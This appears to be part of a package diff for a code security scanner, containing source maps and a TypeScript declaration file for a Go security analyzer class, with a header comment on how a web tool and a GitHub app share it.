+{"version":3,"file":"createVulnerability.js","sourceRoot":"","sources":["../../../../../../../../src/lib/analyzers/go/utils/createVulnerability.ts"],"names":[],"mappings":";AAAA;;;;;GAKG;;AAuEH,sEAyEC;AA7ID,yEAA4E;AAC5E,6EAA4E;AAmE5E,SAAgB,6BAA6B,CAC3C,YAA0C,EAC1C,OAAgB,EAChB,UAAmB,EACnB,UAAmB,EACnB,iBAA0B,EAC1B,cAAuB,EACvB,eAA0B,EAC1B,iBAA0B,EAC1B,gBAAyB,EACzB,sBAA+B;IAE/B,0DAA0D;IAC1D,IAAI,OAAO,YAAY,KAAK,QAAQ,EAAE,CAAC;QACrC,MAAM,MAAM,GAAG,YAAmC,CAAC;QAEnD,MAAM,OAAO,GAAG,IAAA,yCAAsB,EAAC,MAAM,CAAC,QAAQ,CAAC,CAAC;QACxD,MAAM,UAAU,GAAG,IAAA,yCAAoB,EAAC,MAAM,CAAC,QAAQ,CAAC,CAAC;QAEzD,OAAO;YACL,QAAQ,EAAE,MAAM,CAAC,QAAe;YAChC,OAAO,EAAE,MAAM,CAAC,OAAO;YACvB,UAAU,EAAE,MAAM,CAAC,UAAU;YAC7B,IAAI,EAAE,MAAM,CAAC,IAAI;YACjB,QAAQ,EAAE,MAAM,CAAC,QAAQ;YACzB,gBAAgB,EAAE,MAAM,CAAC,gBAAgB;YACzC,SAAS,EAAE,OAAO,CAAC,SAAS;YAC5B,iBAAiB,EAAE,OAAO,CAAC,iBAAiB;YAC5C,MAAM,EAAE,OAAO,CAAC,MAAM;YACtB,KAAK,EAAE,MAAM,CAAC,KAAK;YACnB,GAAG,EAAE,MAAM,CAAC,GAAG;YACf,MAAM,EAAE,MAAM,CAAC,MAAM;YACrB,YAAY,EAAE;gBACZ,WAAW,EAAE,MAAM,CAAC,YAAY,CAAC,WAAW;gBAC5C,cAAc,EAAE,MAAM,CAAC,YAAY,CAAC,cAAc,IAAI,EAAE;gBACxD,eAAe,EAAE,MAAM,CAAC,YAAY,CAAC,eAAe;aACrD;YACD,WAAW,EAAE;gBACX,MAAM,EAAE,MAAM,CAAC,WAAW,CAAC,MAAM;gBACjC,KAAK,EAAE,MAAM,CAAC,WAAW,CAAC,KAAK;gBAC/B,WAAW,EAAE,MAAM,CAAC,WAAW,CAAC,WAAW;aAC5C;SACF,CAAC;IACJ,CAAC;IAED,yDAAyD;IACzD,MAAM,iBAAiB,GAAG,YAAsB,CAAC;IACjD,MAAM,OAAO,GAAG,IAAA,yCAAsB,EAAC,iBAAiB,CAAC,CAAC;IAC1D,MAAM,UAAU,GAAG,IAAA,yCAAoB,EAAC,iBAAiB,CAAC,CAAC;IAE3D,OAAO;QACL,QAAQ,EAAE,OAAO,CAAC,QAAQ;QAC1B,OAAO,EAAE,OAAQ;QACjB,UAAU,EAAE,UAAW;QACvB,IAAI,EAAE,UAAW;QACjB,QAAQ,EAAE,iBAAiB;QAC3B,SAAS,EAAE,OAAO,CAAC,SAAS;QAC5B,iBAAiB,EAAE,OAAO,CAAC,iBAAiB;QAC5C,MAAM,EAAE,OAAO,CAAC,MAAM;QACtB,KAAK,EAAE,UAAU,CAAC,KAAK;QACvB,GAAG,EAAE,UAAU,CAAC,GAAG;QACnB,MAAM,EAAE,UAAU,CAAC,MAAM;QACzB,YAAY,EAAE;YACZ,WAAW,EAAE,iBAAkB;YAC/B,cAAc,EAAE,cAAe;YAC/B,eAAe,EAAE,eAAgB;SAClC;QACD,WAAW,EAAE;YACX,MAAM,EAAE,iBAAkB;YAC1B,KAAK,EAAE,gBAAiB;YACxB,WAAW,EAAE,sBAAuB;SACrC;KACF,CAAC;AACJ,CAAC"}

package/dist/src/lib/analyzers/go-analyzer.d.ts

@@ -0,0 +1,48 @@
+/**
+ * ⚠️ SHARED MODULE: Go Security Analyzer
+ *
+ * CRITICAL: This module is used by BOTH WebTool and GitHub App
+ *
+ * WebTool uses this for:
+ * - /api/analyze endpoint - Interactive single-file analysis (<3s target)
+ * - Real-time vulnerability detection for individual developers
+ *
+ * GitHub App uses this for:
+ * - /api/github/webhook - Batch PR analysis (10-30s OK)
+ * - Automated security checks for professional teams
+ *
+ * ⚠️ BEFORE MODIFYING THIS FILE:
+ * 1. Run all analyzer tests: npm test analyzers
+ * 2. Test WebTool: Paste Go code at /analyze → Verify results
+ * 3. Test GitHub: Open PR with Go → Verify webhook comment
+ * 4. Verify performance: Analysis must complete in <2s per file
+ * 5. Check detection rate: All 26 Go checks must still detect
+ *
+ * CRITICAL OUTPUT FORMAT (DO NOT CHANGE):
+ * - result.security.vulnerabilities - Used by both systems
+ * - Each vulnerability has: line, message, severity, cvssScore, owasp, cwe
+ * - Changing this structure breaks BOTH WebTool and GitHub UI parsing
+ *
+ * See: docs/technical/WEBTOOL_GITHUB_SEPARATION.md
+ *
+ * Last modified: 2026-01-19
+ * Last verified (both systems): 2026-01-19
+ */
+import { ICodeAnalyzer, AnalyzerInput, AnalyzerResult } from './types';
+import { SupportedLanguage } from '../types';
+export declare class GoAnalyzer implements ICodeAnalyzer {
+    readonly language: SupportedLanguage;
+    analyze(input: AnalyzerInput): Promise<AnalyzerResult>;
+    validateSyntax(code: string): Promise<boolean>;
+    getLanguageInfo(): {
+        name: string;
+        extensions: string[];
+        description: string;
+    };
+    private analyzeSyntax;
+    private analyzeQuality;
+    private analyzePerformance;
+    private analyzeSecurity;
+    private calculateMetrics;
+}
+//# sourceMappingURL=go-analyzer.d.ts.map

package/dist/src/lib/analyzers/go-analyzer.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"go-analyzer.d.ts","sourceRoot":"","sources":["../../../../../../src/lib/analyzers/go-analyzer.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;;;;;;;;;;;GA6BG;AAEH,OAAO,EAAE,aAAa,EAAE,aAAa,EAAE,cAAc,EAAoC,MAAM,SAAS,CAAC;AACzG,OAAO,EAAE,iBAAiB,EAAE,MAAM,UAAU,CAAC;AAc7C,qBAAa,UAAW,YAAW,aAAa;IAC9C,SAAgB,QAAQ,EAAE,iBAAiB,CAAQ;IAE7C,OAAO,CAAC,KAAK,EAAE,aAAa,GAAG,OAAO,CAAC,cAAc,CAAC;IA4BtD,cAAc,CAAC,IAAI,EAAE,MAAM,GAAG,OAAO,CAAC,OAAO,CAAC;IAoBpD,eAAe;;;;;IAQf,OAAO,CAAC,aAAa;IA4DrB,OAAO,CAAC,cAAc;IAyBtB,OAAO,CAAC,kBAAkB;IAO1B,OAAO,CAAC,eAAe;IA2CvB,OAAO,CAAC,gBAAgB;CA2BzB"}